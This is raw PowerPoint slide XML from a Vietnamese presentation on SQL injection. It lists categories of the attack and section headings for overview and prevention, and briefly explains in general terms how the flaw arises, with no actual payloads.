            <a:ext cx="2807999" cy="1325100"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 30129"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFF000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN I: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Tổng quan</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Shape 661"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173128" y="1376392"/>
            <a:ext cx="2861999" cy="1325100"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 29853"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00CEF6"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN II: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Các dạng tấn công</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Shape 662"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5798821" y="1376392"/>
            <a:ext cx="2901334" cy="1325100"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 29853"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3C78D8"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN III: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>Cách phòng chống</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Source Sans Pro"/>
              <a:cs typeface="Source Sans Pro"/>
              <a:sym typeface="Source Sans Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840075" y="2941320"/>
            <a:ext cx="3543343" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>đăng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</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smtClean="0"/>
              <a:t>SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dựa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSERT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stored-procedures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="660"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="660"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="661"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="661"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66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62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="662"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="662"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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 grpId="0" animBg="1"/>
      <p:bldP spid="661" grpId="0" animBg="1"/>
      <p:bldP spid="662"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4610548" y="3305234"/>
            <a:ext cx="4023435" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN I: Tổng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>quan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 491"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225238" y="265325"/>
            <a:ext cx="8770620" cy="172786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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pP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TÌM HIỂU CÁC DẠNG TẤN CÔNG SQL INJECTION </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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XÂY DỰNG VÀ DEMO CÁC KỊCH BẢN TẤN CÔNG SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3000" dirty="0">
              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:cs typeface="Segoe UI Historic"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466620" y="2536857"/>
            <a:ext cx="7953480" cy="1649916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection có thể cho phép những kẻ tấn công thực hiện các thao tác trên cơ sở dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lỗ hổng bảo mật này xuất hiện khi ứng dụng không có đoạn mã kiểm tra chuỗi ký tự thoát nhúng trong câu truy vấn SQL, hoặc do sự định kiểu đầu vào không rõ ràng hay do lỗi cú pháp SQL của lập trình viên khiến cho một đoạn mã được xử lý ngoài ý muốn.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 659"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466620" y="272527"/>
            <a:ext cx="6996600" cy="417435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHẦN I: Tổng quan</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="What is SQL Injection? | QAwe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380" y="481245"/>
            <a:ext cx="3049080" cy="20556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6620" y="779302"/>
            <a:ext cx="5004540" cy="16682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vi-VN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-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3182857" y="2868412"/>
            <a:ext cx="5715523" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t>PHẦN II: Các dạng tấn công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:ea typeface="Source Sans Pro"/>
                <a:cs typeface="Source Sans Pro"/>
                <a:sym typeface="Source Sans Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 491"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225238" y="265325"/>
            <a:ext cx="8770620" cy="172786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pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pP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TÌM HIỂU CÁC DẠNG TẤN CÔNG SQL INJECTION </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XÂY DỰNG VÀ DEMO CÁC KỊCH BẢN TẤN CÔNG SQL INJECTION</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3000" dirty="0">
              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:cs typeface="Segoe UI Historic" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452515" y="3606858"/>
            <a:ext cx="3543343" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>đăng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
